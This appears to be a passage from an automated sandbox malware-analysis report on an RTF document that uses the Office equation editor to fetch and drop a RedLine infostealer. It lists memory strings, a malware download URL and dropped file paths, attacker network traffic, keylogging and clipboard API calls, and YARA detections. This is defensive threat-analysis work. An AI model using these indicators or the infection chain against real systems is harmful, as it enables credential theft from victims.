                    Source: RegSvcs.exe, 00000006.00000002.388337952.0000000004F2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobede
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/x
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: RegSvcs.exeString found in binary or memory: https://api.ipify.
                    Source: RegSvcs.exeString found in binary or memory: https://api.ipify.orgcoo
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.LR
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.0000000002574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashLR
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.00000000005F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/(
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exe
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exe1X
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exeC:
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exej
                    Source: EQNEDT32.EXE, 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/ExtExport2.exeooC:
                    Source: tmp1AAE.tmp.6.drString found in binary or memory: https://www.google.com/favicon.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                    Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49162 version: TLS 1.2
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,5_2_008F425A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_008F4458
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,5_2_008F425A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_008E0219
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0090CDAC

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2MbHBiqXH2.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: This is a third-party compiled AutoIt script.5_2_00883B4C
                    Source: notorious53209.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ca95346-2
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d52da328-9
                    Office equation editor drops PE file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00883633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00883633
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C220 NtdllDialogWndProc_W,5_2_0090C220
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_0090C27C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_0090C49C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_0090C788
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_0090C8EE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090C86D SendMessageW,NtdllDialogWndProc_W,5_2_0090C86D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CBAE NtdllDialogWndProc_W,5_2_0090CBAE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CBF9 NtdllDialogWndProc_W,5_2_0090CBF9
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CB50 NtdllDialogWndProc_W,5_2_0090CB50
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CB7F NtdllDialogWndProc_W,5_2_0090CB7F
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CC2E ClientToScreen,NtdllDialogWndProc_W,5_2_0090CC2E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0090CDAC
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090CD6C GetWindowLongW,NtdllDialogWndProc_W,5_2_0090CD6C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00881287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W,5_2_00881287
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00881290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,5_2_00881290
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008816B5 NtdllDialogWndProc_W,5_2_008816B5
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008816DE GetParent,NtdllDialogWndProc_W,5_2_008816DE
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090D6C6 NtdllDialogWndProc_W,5_2_0090D6C6
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0088167D NtdllDialogWndProc_W,5_2_0088167D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,5_2_0090D74C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0088189B NtdllDialogWndProc_W,5_2_0088189B
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090DA9A NtdllDialogWndProc_W,5_2_0090DA9A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090BF4D NtdllDialogWndProc_W,CallWindowProcW,5_2_0090BF4D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,5_2_008E40B1
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,756C1AAC,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,5_2_008D8858
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_008E545F
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0088E8005_2_0088E800
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A33C75_2_008A33C7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008ADBB55_2_008ADBB5
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0090804A5_2_0090804A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0088E0605_2_0088E060
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008941405_2_00894140
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A24055_2_008A2405
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B65225_2_008B6522
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B267E5_2_008B267E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_009006655_2_00900665
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A283A5_2_008A283A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008968435_2_00896843
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B89DF5_2_008B89DF
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B6A945_2_008B6A94
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00900AE25_2_00900AE2
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00898A0E5_2_00898A0E
